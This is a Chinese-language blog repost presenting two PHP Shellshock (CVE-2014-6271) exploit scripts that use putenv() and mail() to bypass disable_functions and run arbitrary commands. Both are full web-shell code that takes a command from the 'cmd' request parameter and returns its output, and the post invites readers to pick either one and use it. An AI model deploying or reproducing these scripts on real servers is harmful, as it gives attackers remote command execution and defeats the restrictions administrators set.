正在阅读:

PHP 5.x and GNU Bash <= 4.3 Shellshock Exploit

4,219

之前ImageMagic漏洞火的时候,本站转发了一篇关于利用ImageMagic漏洞来绕过disable_function限制的文章,文章链接如下:

利用ImageMagick漏洞绕过disable_function

最近网上乱逛,在70sec发现这个脚本,国外大牛早就发出来了,只是我们没有使用,再转发给各位小伙伴们。

测试环境:php 5.3.2 bash 4.1.2 Centos 6

php.ini中存在如下设置:

disable_functions=phpinfo,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source

Bypass1脚本代码

<?php

// Exploit Title: PHP 5.x and GNU Bash <= 4.3 Shellshock Exploit
// Date: 22/11/2014
// Exploit Author: ssbostan
// Vendor Homepage: http://www.gnu.org/software/bash/
// Software Link: http://ftp.gnu.org/gnu/bash/
// Version: <= 4.3
// Tested on: Fedora 17, Ubuntu 8.04
// CVE: http://www.cvedetails.com/cve/CVE-2014-6271/

echo "Disabled functions: ".ini_get('disable_functions')."\n";

if(isset($_GET["cmd"]) && !empty($_GET["cmd"]))
{
$file=tempnam("/tmp", "xpl");
putenv("PHP_XPL=() { :;}; {$_GET["cmd"]}>{$file}");
mail("xpl@localhost", "", "", "", "-bv");
echo '<pre>';
echo file_get_contents($file);
echo '</pre>';
unlink($file);
}

?>

Bypass2脚本代码

<?php
# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
# Google Dork: none
# Date: 10/31/2014
# Exploit Author: Ryan King (Starfall)
# Vendor Homepage: http://php.net
# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
# Version: 5.* (tested on 5.6.2)
# Tested on: Debian 7 and CentOS 5 and 6
# CVE: CVE-2014-6271

echo "Disabled functions: ".ini_get('disable_functions')."\n";

function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283
   if(strstr(readlink("/bin/sh"), "bash") != FALSE) {
     $tmp = tempnam(".","data");
     putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
     // In Safe Mode, the user may only alter environment variables whose names
     // begin with the prefixes supplied by this directive.
     // By default, users will only be able to set environment variables that
     // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty,
     // PHP will let the user modify ANY environment variable!
     mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually send any mail
   }
   else return "Not vuln (not bash)";
   $output = @file_get_contents($tmp);
   @unlink($tmp);
   if($output != "") return $output;
   else return "No output, or not vuln.";
}
echo '<pre>';
echo shellshock($_REQUEST["cmd"]);
echo '</pre>';
?>

两个脚本功能一样的,写法稍有不同,大家可以任选其一使用,效果如图:

bypass

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌